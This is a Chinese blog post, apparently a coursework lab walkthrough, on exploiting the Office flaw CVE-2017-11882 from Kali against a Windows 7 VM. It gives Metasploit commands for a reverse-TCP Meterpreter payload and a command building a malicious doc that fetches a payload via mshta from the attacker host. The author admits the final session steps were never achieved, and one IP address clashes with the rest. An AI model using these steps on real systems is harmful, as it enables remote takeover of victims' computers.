【网络安全作业】office漏洞检测与利用

川长思鸟来 2021-08-19 17:39 700阅读 0赞

> 注：可以在kali中打开此博客，所有的命令行直接拖动即可，无需自己手敲，一方面是为了方便，一方面是防止不留意写错，可能导致前功尽弃。

**目录**

一、下载与设置

1、操作系统下载

2、操作系统安装

3、脚本及cve文件下载

4、文件转存

二、操作

1、打开metasploit

2、查找cve模块

3、使用cve模块

4、运行-exploit -j

5、生成恶意doc文件

6、打开文件

7、Kali查看

8、入侵操作

三、注意点

--------------------

**一、下载与设置**

**1、操作系统下载**

我们用到win7及kali操作系统，用win7做目标机，并安装好**带有漏洞**的office。用kali做攻击机。

**2、操作系统安装**

安装kali虚拟机。安装教程参考：

> https://blog.csdn.net/shuiyixin/article/details/101021285

安装win7。

**3、脚本及cve文件下载**

Python脚本：https://github.com/Ridter/CVE-2017-11882。脚本用于生成恶意文件。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_16_color_FFF77F_t_70][]

cve文件：https://github.com/0x09AL/CVE-2017-11882-metasploit。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_16_color_FFF77F_t_70 1][]

**4、文件转存**

把下载的cve\_2017\_11882.rb文件复制到如下目录：

> /usr/share/metasploit-framework/modules/exploits/windows/smb/

把下载的cve\_2017\_11882.rtf放到如下目录：

> /usr/share/metasploit-framework/data/exploits/

通过命令行可以查看，如下：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_36_color_FF75FF_t_70][]

**二、操作**

**1、打开metasploit**

点击metasploit图标打开软件。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70][]

**2、查找cve模块**

使用命令查找对应的模块：

> **search cve\_2017\_11882**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 1][]

**3、使用cve模块**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 2][]

使用exploit

> **use exploit/windows/smb/cve\_2017\_11882**

首先使用命令设置payload为反弹tcp。

> **set payload windows/meterpreter/reverse\_tcp**

其次使用命令设置攻击机的ip(可以使用**ifconfig**查看)。

> **set lhost 192.168.72.130**

再使用命令设置URI的路径（注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径）

> **set URIPATH test**

最后检查配置。

> **show options**

## 4、**运行\-exploit -j**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 3][]

## 5、**生成恶意doc文件**

在桌面右键打开一个终端，把Command109b\_CVE-2017-11882.py复制到桌面，为了方便，可以将文件改个名字cve.py，运行命令python cve.py -c "mshta http://192.168.72.130:8080/test" -o test4.doc  生成恶意doc文件。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_20_color_FFF77F_t_70][]

这里要注意：

> Python系统自带，无需自己再下载；
> 
> http://192.168.0.110:8080/test：是路径。前面的“192.168.72.130”是ip地址，可以通过ifconfig查看；8080是端口，固定的；test是前面设置的URIPATH，前面设置是什么，这里就写什么。
> 
> test4是文件名，可以自己设置的。

## 6、**打开文件**

复制文件到目标机打开。我复制的方式是使用优盘，从kali虚拟机存到外接优盘，再从外接优盘转存到win7虚拟机

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF78F_t_70][]

> 注：7、8、是理论操作了，目前没有找到合适的office（有漏洞的版本），所以并没有按照预期得到结果。后面找到了再进行完善。

## 7、**Kali查看**

返回kali查看，可以看到已经访问通过。

使用命令进行查看。可以看到win7系统的相关信息。

> **sessions -i**

输出命令切换进入win7控制程序。

> **sessions -i 1**

**8、入侵操作**

通过以上的命令，我们就可以进入到win7系统，输入shell，就可以进入cmd界面，就可以使用cmd命令进行一系列操作。

# 三、注意点 #

在实现过程中遇到很多问题，在这里总结：

> win7系统不要下载那种可以一键安装的系统，无法用虚拟机打开。
> 
> 文件的下载等操作一般都是在kali中实现，所以，可以直接将本文在kali中打开。文件直接下载到kali中。
> 
> office尽量下载老版本，有漏洞，可以实现该功能。现在网上的一般都是修复后的。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_16_color_FFF77F_t_70]: /images/20210516/1838c9f96828419ab017adacbb93eae5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_16_color_FFF77F_t_70 1]: /images/20210516/bba3f6d49ab547ceb6b68fb5ab6d8796.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_36_color_FF75FF_t_70]: /images/20210516/a790c8ac7a534546a9236d79c0ebee11.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70]: /images/20210516/7d150b7f07984dcbad5d51729256b876.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 1]: /images/20210516/e8af771ea53a484a9f883db6c1f93fc6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 2]: /images/20210516/fe7cd15eff6c4490bb2b9dc3614891c1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF77F_t_70 3]: /images/20210516/f1cbc5824477400a986ff05887fca60d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_20_color_FFF77F_t_70]: /images/20210516/c5f7b1be3717424999a2cf7206dbdf02.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NodWl5aXhpbg_size_26_color_FFF78F_t_70]: /images/20210516/2513820f513342ffb6c97bd95a43cf2f.png